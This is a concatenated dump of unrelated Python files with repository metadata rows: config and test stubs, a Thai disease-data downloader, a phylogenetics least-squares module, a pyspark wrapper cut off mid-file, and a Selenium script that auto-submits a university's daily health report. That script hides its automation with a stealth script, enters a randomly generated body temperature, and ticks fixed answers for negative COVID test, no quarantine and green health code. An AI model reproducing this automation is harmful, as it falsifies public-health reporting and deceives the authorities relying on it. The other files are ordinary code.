AWS_SPOT_PRICE = '1.0'
AWS_ACCESS_KEY = os.environ.get("AWS_ACCESS_KEY", None)
AWS_ACCESS_SECRET = os.environ.get("AWS_ACCESS_SECRET", None)
AWS_IAM_INSTANCE_PROFILE_NAME = "rllab"
AWS_SECURITY_GROUPS = ["rllab"]
AWS_SECURITY_GROUP_IDS = []
AWS_NETWORK_INTERFACES = []
AWS_EXTRA_CONFIGS = dict()
AWS_REGION_NAME = "us-east-1"
CODE_SYNC_IGNORES = ["*.git/*", "*data/*", "*.pod/*"]
DOCKER_CODE_DIR = "/root/code/rllab"
AWS_CODE_SYNC_S3_PATH = "s3://to/be/overridden/in/personal"
# whether to use fast code sync
FAST_CODE_SYNC = True
FAST_CODE_SYNC_IGNORES = [".git", "data", ".pods"]
KUBE_DEFAULT_RESOURCES = {
"requests": {
"cpu": 0.8,
}
}
KUBE_DEFAULT_NODE_SELECTOR = {
"aws/type": "m4.xlarge",
}
MUJOCO_KEY_PATH = osp.expanduser("~/.mujoco")
# MUJOCO_KEY_PATH = osp.join(osp.dirname(__file__), "../vendor/mujoco")
MUJOCO_MODEL_PATH = osp.join(osp.dirname(__file__), "../vendor/mujoco_models")
ENV = {}
EBS_OPTIMIZED = True
if osp.exists(osp.join(osp.dirname(__file__), "config_personal.py")):
from .config_personal import *
else:
print("Creating your personal config from template...")
from shutil import copy
copy(osp.join(PROJECT_PATH, "rllab/config_personal_template.py"), osp.join(PROJECT_PATH, "rllab/config_personal.py"))
from .config_personal import *
print("Personal config created, but you should probably edit it before further experiments " \
"are run")
if 'CIRCLECI' not in os.environ:
print("Exiting.")
import sys; sys.exit(0)
LABEL = ""
| 21.736264
| 121
| 0.704247
|
aabd1c96726a91821d1e508d0192cad891c0d054
| 1,443
|
py
|
Python
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 39
|
2016-10-02T06:45:12.000Z
|
2021-09-08T20:39:53.000Z
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 35
|
2016-11-02T05:06:34.000Z
|
2021-09-03T06:03:08.000Z
|
clients/python/generated/test/test_inline_object2.py
|
ub1k24/swagger-aem
|
c9ae0cf8b57d27658527982d6d6653790d3acf80
|
[
"Apache-2.0"
] | 23
|
2016-11-07T04:14:42.000Z
|
2021-02-15T09:49:13.000Z
|
# coding: utf-8
"""
Adobe Experience Manager (AEM) API
Swagger AEM is an OpenAPI specification for Adobe Experience Manager (AEM) API # noqa: E501
The version of the OpenAPI document: 3.4.0-pre.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import swaggeraem
from swaggeraem.models.inline_object2 import InlineObject2 # noqa: E501
from swaggeraem.rest import ApiException
class TestInlineObject2(unittest.TestCase):
"""InlineObject2 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test InlineObject2
            include_optional is a boolean; when False only required
params are included, when True both required and
optional params are included """
# model = swaggeraem.models.inline_object2.InlineObject2() # noqa: E501
if include_optional :
return InlineObject2(
certificate = bytes(b'blah')
)
else :
return InlineObject2(
)
def testInlineObject2(self):
"""Test InlineObject2"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| 26.722222
| 96
| 0.67429
|
d4097900d3898f5f10b17f62888eca6963bb958a
| 1,676
|
py
|
Python
|
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
exabel_data_sdk/tests/client/api/test_entity_api.py
|
aksestok/python-sdk
|
520a3d9822ffa9a023262b379ea3b3d19cb10853
|
[
"MIT"
] | null | null | null |
import unittest
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.client.api.entity_api import EntityApi
from exabel_data_sdk.tests.client.api.mock_entity_api import MockEntityApi
class TestEntityApi(unittest.TestCase):
def test_upsert(self):
for assume_exists in (True, False):
entity_api: EntityApi = MockEntityApi()
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
)
created_entity = entity_api.upsert_entity(expected, assume_exists)
self.assertEqual(expected, created_entity)
updated_entity = entity_api.upsert_entity(expected, assume_exists)
self.assertEqual(expected, updated_entity)
def test_upsert_replaces_resource(self):
for assume_exists in (True, False):
entity_api: EntityApi = MockEntityApi()
old_entity = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon's old display name",
description="Amazon's old description",
properties={"old_property": "old_value"},
)
expected = Entity(
name="entityTypes/company/entities/Amazon",
display_name="Amazon",
description="Amazon's new description",
)
entity_api.create_entity(old_entity, old_entity.get_entity_type())
entity_api.upsert_entity(expected, assume_exists)
actual_entity = entity_api.get_entity(expected.name)
self.assertEqual(expected, actual_entity)
| 42.974359
| 78
| 0.648568
|
b902705c8f6e93393788099063b26598ccbb0c02
| 5,742
|
py
|
Python
|
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
main.py
|
incredible-smurf/xjtu_healthy_for_graduates
|
3c09d9626b01ef97a7146d5649e58b024a6bea25
|
[
"MIT"
] | null | null | null |
#coding=utf-8
import logging
import os
import random
import time
from dotenv import load_dotenv
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
load_dotenv()
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def wait_for_ajax(driver):
wait = WebDriverWait(driver, 15)
try:
wait.until(lambda driver: driver.execute_script('return jQuery.active') == 0)
wait.until(lambda driver: driver.execute_script('return document.readyState') == 'complete')
except Exception as e:
pass
def main():
netid = os.getenv("netid")
password = os.getenv("password")
options = webdriver.ChromeOptions()
options.headless = True
options.add_argument("--window-size=1920,1080")
options.add_argument('user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36')
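    # stealth.min.js is injected into every new document below (via the CDP command
    # Page.addScriptToEvaluateOnNewDocument) so headless Chrome is harder to detect
    # as an automated browser.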
with open('./stealth.min.js') as f:
js = f.read()
#options.add_experimental_option("debuggerAddress", "127.0.0.1:9222")
driver = webdriver.Chrome(options=options)
driver.execute_cdp_cmd("Page.addScriptToEvaluateOnNewDocument", {"source": js})
driver.get("http://jkrb.xjtu.edu.cn/EIP/user/index.htm")
wait = WebDriverWait(driver=driver, timeout=30)
wait.until((EC.url_contains("org.xjtu.edu.cn")))
elem = wait.until(
EC.presence_of_element_located((By.XPATH, '//*[@id="form1"]/input[1]'))
)
elem.send_keys(netid)
elem = wait.until(
EC.presence_of_element_located((By.XPATH, '//*[@id="form1"]/input[2]'))
)
elem.send_keys(password)
elem.send_keys(Keys.ENTER)
try:
wait.until(EC.url_contains("http://jkrb.xjtu.edu.cn/EIP/user/index.htm"))
except Exception:
logger.info("nothing")
logger.info("Successful Login")
wait_for_ajax(driver)
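    # The report page nests several iframes; the switch_to.frame calls below walk
    # down the frames (identified here by their onload handlers) until the daily
    # health report menu entry can be clicked.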
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload2()']")
driver.switch_to.frame(iframe)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload1()']")
driver.switch_to.frame(iframe)
iframe=driver.find_element_by_xpath('//div[@title="研究生每日健康状况填报"]')
iframe.click()
driver.implicitly_wait(1)
driver.switch_to.default_content()
driver.implicitly_wait(5)
iframe = driver.find_element_by_xpath(
"//iframe[@onload='__iframe_onload3()']")
driver.switch_to.frame(iframe)
iframe= driver.find_element_by_xpath(r'//li[@data-blname="每日健康填报"]')
iframe.click()
driver.implicitly_wait(1)
driver.switch_to.default_content()
driver.implicitly_wait(5)
try :
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload4()']")
driver.switch_to.frame(iframe)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload1()']")
driver.switch_to.frame(iframe)
temp = str(round(36 + random.random(), 1))
driver.find_element_by_xpath(
'//*[@id="BRTW$text"]'
).send_keys(temp)
        print('st 确认须知')  # i.e. "confirm the notice"
driver.find_element_by_xpath('//*[@id="mini-2$ck$0"and @value="1"]').click()
        # confirm the notice
        # date
date = time.localtime(time.time()-8*3600)
send_date = str(date.tm_year)+'-'+str(date.tm_mon)+'-'+str(date.tm_mday)+" 13:31"
data_input = driver.find_element_by_xpath('//*[@id="ZJYCHSJCSJ$text"]')
time.sleep(5)
data_input.clear()
data_input.send_keys(send_date)
driver.find_element_by_xpath('//*[@id="mini-4$ck$0" and @value="是"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-9$ck$1" and @value="阴性"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-10$ck$0" and @value="未被隔离"]').click()
time.sleep(random.uniform(1,2))
driver.find_element_by_xpath('//*[@id="mini-11$ck$2" and @value="绿色"]').click()
time.sleep(random.uniform(1,2))
logger.info(f"Today's body temp. is {temp}")
driver.switch_to.default_content()
driver.implicitly_wait(5)
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload4()']")
driver.implicitly_wait(5)
driver.switch_to.frame(iframe)
submit=driver.find_element_by_xpath('//*[@id="sendBtn"]')
submit.click()
driver.implicitly_wait(5)
submit=driver.find_element_by_xpath('//*[@id="mini-17"]/span')
submit.click()
try:
driver.switch_to.default_content()
driver.implicitly_wait(1)
iframe = driver.find_element_by_xpath(
"//iframe[@onload='__iframe_onload4()']"
)
driver.switch_to.frame(iframe)
elem = driver.find_element_by_xpath("//*[@id='mini-19$content']")
logger.info(elem.text)
except NoSuchElementException:
logger.info("Successful submit!")
except NoSuchElementException:
driver.switch_to.default_content()
iframe = driver.find_element_by_xpath("//iframe[@onload='__iframe_onload5()']")
driver.switch_to.frame(iframe)
elem = driver.find_element_by_xpath("//*[@id='messageId']")
logger.info("You've already checked in.")
logger.info(elem.text)
if __name__ == "__main__":
main()
| 34.590361
| 160
| 0.653605
|
3ee91d056507eea2b793da59df8f6109f0e43d79
| 3,949
|
py
|
Python
|
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
uh.collegescheduler.com/corecurriculum/sectionattributes/src/sectionattributes.py
|
cougargrades/json
|
42f0c46f8c69a2c7f8c531775f744a782ae825a8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import requests
import json
from halo import Halo
parser = argparse.ArgumentParser(description='Scrapes UH CollegeScheduler API to enumerate all courses by section attributes.')
parser.add_argument('apiUrl', metavar='API_URL', type=str,
help='The API URL used. No trailing slash. Ex: http://uh.collegescheduler.com')
args = parser.parse_args()
HOST = args.apiUrl
catalog_data = {}
try:
spinner = Halo(text=f'Testing API access', spinner='dots')
spinner.start()
res = requests.get(f'{HOST}/api/terms')
if res.status_code == 200 and 'studentCareers' in res.json()[0].keys():
spinner.succeed(text=f'API access confirmed')
else:
spinner.fail(text=f'API access failed')
except Exception as err:
spinner.fail(text=f'API access failed with an Exception: {err}')
try:
spinner = Halo(text=f'Enumerating available terms', spinner='dots')
spinner.start()
res = requests.get(f'{HOST}/api/terms')
catalog_data["terms"] = [x["id"] for x in res.json()]
spinner.succeed()
print(f'\t{catalog_data["terms"]}')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Enumerating section attributes', spinner='dots')
spinnertxt = spinner.text
n = 0
spinner.start()
catalog_data["sectionAttributes"] = []
# for every term currently accessible
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributes')
# for every attribute
catalog_data["sectionAttributes"] += [{ "id": x["id"], "title": x["attrTitle"] } for x in res.json()]
deduped = []
for i in catalog_data["sectionAttributes"]:
if i not in deduped:
deduped.append(i)
catalog_data["sectionAttributes"] = deduped
spinner.succeed()
print(f'\t{[x["id"] for x in catalog_data["sectionAttributes"]]}')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Computing total course count', spinner='dots')
spinner.start()
# for every term currently accessible
total = 0
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/courses')
total += len(res.json())
spinner.succeed(f'{total} total courses found from accessible terms.')
except Exception as err:
spinner.fail()
print(err)
try:
spinner = Halo(text=f'Enumerating courses by subject, by section attributes, by term', spinner='dots')
spinnertxt = spinner.text
n = 0
spinner.start()
# for every term currently accessible
for term in catalog_data["terms"]:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributes')
# for every attribute
attributes = [x["id"] for x in res.json()]
for attr in attributes:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributevalues/{attr}/subjects')
attributed_courses = []
subjects = [x["id"] for x in res.json()]
# for every subject
for sub in subjects:
res = requests.get(f'{HOST}/api/terms/{term}/sectionattributevalues/{attr}/subjects/{sub}/courses')
courses = [x for x in res.json()]
for item in courses:
item["sectionAttribute"] = attr
spinner.text = f'{spinnertxt}: {n} courses observed, generating `{term} {attr}.jsonl`'
n += 1
attributed_courses += courses
with open(f'{term} {attr}.jsonl', 'w') as f:
for item in attributed_courses:
f.write(f'{json.dumps(item)}\n')
spinner.succeed()
print(f'Files were written')
except Exception as err:
spinner.fail()
print(err)
# write manifest.json
with open(f'manifest.json', 'w') as f:
f.write(f'{json.dumps(catalog_data, indent=4, sort_keys=True)}\n')
| 35.258929
| 127
| 0.62902
|
a01efdf105fb89ca1c8a5c32a5f43d981fbba61d
| 3,372
|
py
|
Python
|
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
src/cogent3/phylo/least_squares.py
|
rahulghangas/cogent3
|
f00cf822efce5f3141b3c7dafac81cb94a311e22
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import numpy
from numpy.linalg import solve as solve_linear_equations
from .tree_space import TreeEvaluator, ancestry2tree
from .util import (
distance_dict_and_names_to_1D,
distance_dict_to_1D,
triangular_order,
)
__author__ = "Peter Maxwell"
__copyright__ = "Copyright 2007-2019, The Cogent Project"
__credits__ = ["Peter Maxwell", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2019.9.13a"
__maintainer__ = "Peter Maxwell"
__email__ = "pm67nz@gmail.com"
__status__ = "Production"
# This is a fairly slow implementation and NOT suitable for large trees.
# Trees are represented as "ancestry" matrices in which A[i,j] iff j is an
# ancestor of i. For the LS calculations the ancestry matrix is converted
# to a "paths" matrix or "split metric" in which S[p,j] iff the path between
# the pth pair of tips passes through edge j.
def _ancestry2paths(A):
"""Convert edge x edge ancestry matrix to tip-to-tip path x edge
split metric matrix. The paths will be in the same triangular matrix order
as produced by distance_dict_and_names_to_1D, provided that the tips appear in
the correct order in A"""
tips = [i for i in range(A.shape[0]) if sum(A[:, i]) == 1]
paths = []
for (tip1, tip2) in triangular_order(tips):
path = A[tip1] ^ A[tip2]
paths.append(path)
return numpy.array(paths)
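# Hedged worked example (added for illustration; not part of the original module).
# For the rooted 3-tip tree ((a,b),c) with nodes ordered [a, b, c, ab, root] and
# A[i, j] = 1 iff j is an ancestor of i (including i itself):
_example_A = numpy.array([[1, 0, 0, 1, 1],   # a: ancestors {a, ab, root}
                          [0, 1, 0, 1, 1],   # b: ancestors {b, ab, root}
                          [0, 0, 1, 0, 1],   # c: ancestors {c, root}
                          [0, 0, 0, 1, 1],   # ab
                          [0, 0, 0, 0, 1]])  # root
_example_paths = _ancestry2paths(_example_A)
# Each row is the XOR of two tip rows, i.e. the edges on the path between a pair
# of tips: a-b crosses 2 edges, while a-c and b-c cross 3 edges each.
assert _example_paths.shape[1] == 5
assert sorted(int(row.sum()) for row in _example_paths) == [2, 3, 3]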
class WLS(TreeEvaluator):
"""(err, best_tree) = WLS(dists).trex()"""
def __init__(self, dists, weights=None):
"""Arguments:
- dists: a dict with structure (seq1, seq2): distance
- weights: an equivalently structured dict with measurements of
              variability of the distance estimates. By default, a weight of
              1/d**2 is used for each distance d."""
try:
dists = dists.to_dict()
except AttributeError:
pass
self.dists = dists
self.weights = weights or dict(
(key, 1.0 / (self.dists[key] ** 2)) for key in self.dists
)
(self.names, dists) = distance_dict_to_1D(self.dists)
def make_tree_scorer(self, names):
dists = distance_dict_and_names_to_1D(self.dists, names)
weights = distance_dict_and_names_to_1D(self.weights, names)
# dists and weights are 1D forms of triangular tip x tip matrices
# The order of the tip-to-tip paths is the same for dists, weights and
# A
weights_dists = weights * dists
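        # The nested evaluate() below solves the weighted normal equations
        # (A^T W A) b = A^T W d for the branch lengths b, clamps negative lengths
        # to zero, and scores the candidate tree by the (unweighted) sum of
        # squared residuals between fitted and observed path lengths.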
def evaluate(
ancestry,
lengths=None,
sum=sum,
_ancestry2paths=_ancestry2paths,
dot=numpy.dot,
maximum=numpy.maximum,
transpose=numpy.transpose,
solve=solve_linear_equations,
):
A = _ancestry2paths(ancestry)
if lengths is None:
At = transpose(A)
X = dot(weights * At, A)
y = dot(At, weights_dists)
lengths = solve(X, y)
lengths = maximum(lengths, 0.0)
diffs = dot(A, lengths) - dists
err = sum(diffs ** 2)
return (err, lengths)
return evaluate
def result2output(self, err, ancestry, lengths, names):
return (err, ancestry2tree(ancestry, lengths, names))
def wls(*args, **kw):
(err, tree) = WLS(*args).trex(**kw)
return tree
| 33.386139
| 82
| 0.628114
|
066fbe5b26bae836883f037e60b9232393167605
| 3,159
|
py
|
Python
|
src/data/download/TH_disease.py
|
juliazam/healthcare_ASEAN
|
3cc451f723124f18b2d11c79ff80a6c5a9354c6e
|
[
"MIT"
] | 25
|
2016-04-24T14:00:36.000Z
|
2021-01-07T07:26:00.000Z
|
src/data/download/TH_disease.py
|
shikhakhanna19/healthcare_ASEAN
|
3f89ec67fde825bf3b6275cee0e8f13812533c1e
|
[
"MIT"
] | 25
|
2016-06-24T07:04:39.000Z
|
2020-10-03T23:01:41.000Z
|
src/data/download/TH_disease.py
|
shikhakhanna19/healthcare_ASEAN
|
3f89ec67fde825bf3b6275cee0e8f13812533c1e
|
[
"MIT"
] | 112
|
2016-06-24T01:41:00.000Z
|
2020-10-03T00:33:22.000Z
|
# -*- coding: utf-8 -*-
"""Download historical RTF data from Thailand's Bureau of Epidemiology."""
from bs4 import BeautifulSoup
import re
import sys
import os
import logging
import requests
BASE_URL = 'http://www.boe.moph.go.th/boedb/surdata'
PAGE_URL = BASE_URL + '/disease.php?dcontent=old&ds={}'
DISEASE_CODES = {'Malaria': 30, 'Dengue Fever': 66}
DATA_DIR = os.path.join(os.path.abspath(__file__ + '/../../../..'), 'data/raw')
logger = logging.getLogger()
logger.addHandler(logging.NullHandler())
def log_url(r, *args, **kwargs):
logger.info('Downloading %s', r.url)
def scrape_links(url):
    """Return the links to all .rtf files found at the given url."""
response = requests.get(url)
response.raise_for_status()
logger.info('Scraping links in %s', url)
soup = BeautifulSoup(response.content, 'html.parser')
return soup.find_all(href=re.compile('.rtf'))
def format_raw_data_path(disease_subfolder, link):
data_subfolder = link.parent.parent.find('font').contents[0].strip('()')
file_name = link.contents[0]
dir_path = os.path.join(DATA_DIR, disease_subfolder, data_subfolder)
os.makedirs(dir_path, exist_ok=True)
return os.path.join(dir_path, '%s.rtf' % (file_name))
def download_file(download_url):
# Request will be redirected unless the HTTP referer is the original host
headers = {'Referer': BASE_URL}
response = requests.get(download_url, headers=headers,
hooks=dict(response=log_url))
response.raise_for_status()
return response
def download():
# Overwrite the INFO logging level inherited from the root logger
logging.getLogger('requests').setLevel(logging.ERROR)
for (name, dc) in DISEASE_CODES.items():
logger.info('Downloading files for %s', name)
try:
links = scrape_links(PAGE_URL.format(dc))
except requests.exceptions.RequestException as e:
logger.critical('Failed to GET the Bureau of Epidemiology\'s site')
sys.exit(1)
for index, link in enumerate(links):
disease_subfolder = name.lower() + "_TH"
file_path = format_raw_data_path(disease_subfolder, link)
data_url = BASE_URL + '/' + link['href']
try:
raw_data = download_file(data_url)
except requests.exceptions.RequestException as e:
if e.response.status_code == 404:
logger.info('Failed to download %s since file was not found \
on server with HTTP status code 404', e.response.url)
continue
logger.exception(
'Failed to download %s with HTTP status code %i',
e.response.url, e.response.status_code
)
continue
logger.debug("Writing to %s", file_path)
with open(file_path, 'wb') as data_file:
data_file.write(raw_data.content)
else:
logger.info('Finished downloading files for %s', name)
if __name__ == '__main__':
import logging.config
logging.config.fileConfig('logconf.ini')
download()
| 35.1
| 81
| 0.63881
|
385a2439e27e28a49e8e1c7d19541ab9545dadac
| 16,937
|
py
|
Python
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2022-02-15T04:39:56.000Z
|
2022-02-15T04:39:56.000Z
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3
|
2022-01-21T23:55:04.000Z
|
2022-02-24T20:00:18.000Z
|
python/pyspark/ml/wrapper.py
|
yangwwei/spark
|
dc153f525c8c895b9ceac8dfb3516b601c86a462
|
[
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2022-03-09T08:50:07.000Z
|
2022-03-09T08:50:07.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod
from typing import Any, Generic, Optional, List, Type, TypeVar, TYPE_CHECKING
from pyspark import since
from pyspark import SparkContext
from pyspark.sql import DataFrame
from pyspark.ml import Estimator, Predictor, PredictionModel, Transformer, Model
from pyspark.ml.base import _PredictorParams
from pyspark.ml.param import Param, Params
from pyspark.ml.util import _jvm # type: ignore[attr-defined]
from pyspark.ml.common import inherit_doc, _java2py, _py2java
if TYPE_CHECKING:
from pyspark.ml._typing import ParamMap
from py4j.java_gateway import JavaObject, JavaClass
T = TypeVar("T")
JW = TypeVar("JW", bound="JavaWrapper")
JM = TypeVar("JM", bound="JavaTransformer")
JP = TypeVar("JP", bound="JavaParams")
class JavaWrapper:
"""
Wrapper class for a Java companion object
"""
def __init__(self, java_obj: Optional["JavaObject"] = None):
super(JavaWrapper, self).__init__()
self._java_obj = java_obj
def __del__(self) -> None:
if SparkContext._active_spark_context and self._java_obj is not None:
SparkContext._active_spark_context._gateway.detach( # type: ignore[union-attr]
self._java_obj
)
@classmethod
def _create_from_java_class(cls: Type[JW], java_class: str, *args: Any) -> JW:
"""
Construct this object from given Java classname and arguments
"""
java_obj = JavaWrapper._new_java_obj(java_class, *args)
return cls(java_obj)
def _call_java(self, name: str, *args: Any) -> Any:
m = getattr(self._java_obj, name)
sc = SparkContext._active_spark_context
assert sc is not None
java_args = [_py2java(sc, arg) for arg in args]
return _java2py(sc, m(*java_args))
@staticmethod
def _new_java_obj(java_class: str, *args: Any) -> "JavaObject":
"""
Returns a new Java object.
"""
sc = SparkContext._active_spark_context
assert sc is not None
java_obj = _jvm()
for name in java_class.split("."):
java_obj = getattr(java_obj, name)
java_args = [_py2java(sc, arg) for arg in args]
return java_obj(*java_args)
@staticmethod
def _new_java_array(pylist: List[Any], java_class: "JavaClass") -> "JavaObject":
"""
Create a Java array of given java_class type. Useful for
calling a method with a Scala Array from Python with Py4J.
If the param pylist is a 2D array, then a 2D java array will be returned.
The returned 2D java array is a square, non-jagged 2D array that is big
enough for all elements. The empty slots in the inner Java arrays will
be filled with null to make the non-jagged 2D array.
Parameters
----------
pylist : list
Python list to convert to a Java Array.
java_class : :py:class:`py4j.java_gateway.JavaClass`
Java class to specify the type of Array. Should be in the
form of sc._gateway.jvm.* (sc is a valid Spark Context).
Example primitive Java classes:
- basestring -> sc._gateway.jvm.java.lang.String
- int -> sc._gateway.jvm.java.lang.Integer
- float -> sc._gateway.jvm.java.lang.Double
- bool -> sc._gateway.jvm.java.lang.Boolean
Returns
-------
:py:class:`py4j.java_collections.JavaArray`
Java Array of converted pylist.
"""
sc = SparkContext._active_spark_context
assert sc is not None
assert sc._gateway is not None
java_array = None
if len(pylist) > 0 and isinstance(pylist[0], list):
# If pylist is a 2D array, then a 2D java array will be created.
# The 2D array is a square, non-jagged 2D array that is big enough for all elements.
inner_array_length = 0
for i in range(len(pylist)):
inner_array_length = max(inner_array_length, len(pylist[i]))
java_array = sc._gateway.new_array(java_class, len(pylist), inner_array_length)
for i in range(len(pylist)):
for j in range(len(pylist[i])):
java_array[i][j] = pylist[i][j]
else:
java_array = sc._gateway.new_array(java_class, len(pylist))
for i in range(len(pylist)):
java_array[i] = pylist[i]
return java_array
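    # Hedged usage note (added): callers typically pass something like
    # JavaWrapper._new_java_array(py_list, sc._gateway.jvm.java.lang.String)
    # to build the JVM-side Array[String] a Scala method expects.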
@inherit_doc
class JavaParams(JavaWrapper, Params, metaclass=ABCMeta):
"""
Utility class to help create wrapper classes from Java/Scala
implementations of pipeline components.
"""
#: The param values in the Java object should be
#: synced with the Python wrapper in fit/transform/evaluate/copy.
def _make_java_param_pair(self, param: Param[T], value: T) -> "JavaObject":
"""
Makes a Java param pair.
"""
sc = SparkContext._active_spark_context
assert sc is not None and self._java_obj is not None
param = self._resolveParam(param)
java_param = self._java_obj.getParam(param.name)
java_value = _py2java(sc, value)
return java_param.w(java_value)
def _transfer_params_to_java(self) -> None:
"""
Transforms the embedded params to the companion Java object.
"""
assert self._java_obj is not None
pair_defaults = []
for param in self.params:
if self.isSet(param):
pair = self._make_java_param_pair(param, self._paramMap[param])
self._java_obj.set(pair)
if self.hasDefault(param):
pair = self._make_java_param_pair(param, self._defaultParamMap[param])
pair_defaults.append(pair)
if len(pair_defaults) > 0:
sc = SparkContext._active_spark_context
assert sc is not None and sc._jvm is not None
pair_defaults_seq = sc._jvm.PythonUtils.toSeq(pair_defaults)
self._java_obj.setDefault(pair_defaults_seq)
def _transfer_param_map_to_java(self, pyParamMap: "ParamMap") -> "JavaObject":
"""
Transforms a Python ParamMap into a Java ParamMap.
"""
paramMap = JavaWrapper._new_java_obj("org.apache.spark.ml.param.ParamMap")
for param in self.params:
if param in pyParamMap:
pair = self._make_java_param_pair(param, pyParamMap[param])
paramMap.put([pair])
return paramMap
def _create_params_from_java(self) -> None:
"""
SPARK-10931: Temporary fix to create params that are defined in the Java obj but not here
"""
assert self._java_obj is not None
java_params = list(self._java_obj.params())
from pyspark.ml.param import Param
for java_param in java_params:
java_param_name = java_param.name()
if not hasattr(self, java_param_name):
param: Param[Any] = Param(self, java_param_name, java_param.doc())
setattr(param, "created_from_java_param", True)
setattr(self, java_param_name, param)
self._params = None # need to reset so self.params will discover new params
def _transfer_params_from_java(self) -> None:
"""
Transforms the embedded params from the companion Java object.
"""
sc = SparkContext._active_spark_context
assert sc is not None and self._java_obj is not None
for param in self.params:
if self._java_obj.hasParam(param.name):
java_param = self._java_obj.getParam(param.name)
# SPARK-14931: Only check set params back to avoid default params mismatch.
if self._java_obj.isSet(java_param):
value = _java2py(sc, self._java_obj.getOrDefault(java_param))
self._set(**{param.name: value})
# SPARK-10931: Temporary fix for params that have a default in Java
if self._java_obj.hasDefault(java_param) and not self.isDefined(param):
value = _java2py(sc, self._java_obj.getDefault(java_param)).get()
self._setDefault(**{param.name: value})
def _transfer_param_map_from_java(self, javaParamMap: "JavaObject") -> "ParamMap":
"""
Transforms a Java ParamMap into a Python ParamMap.
"""
sc = SparkContext._active_spark_context
assert sc is not None
paramMap = dict()
for pair in javaParamMap.toList():
param = pair.param()
if self.hasParam(str(param.name())):
paramMap[self.getParam(param.name())] = _java2py(sc, pair.value())
return paramMap
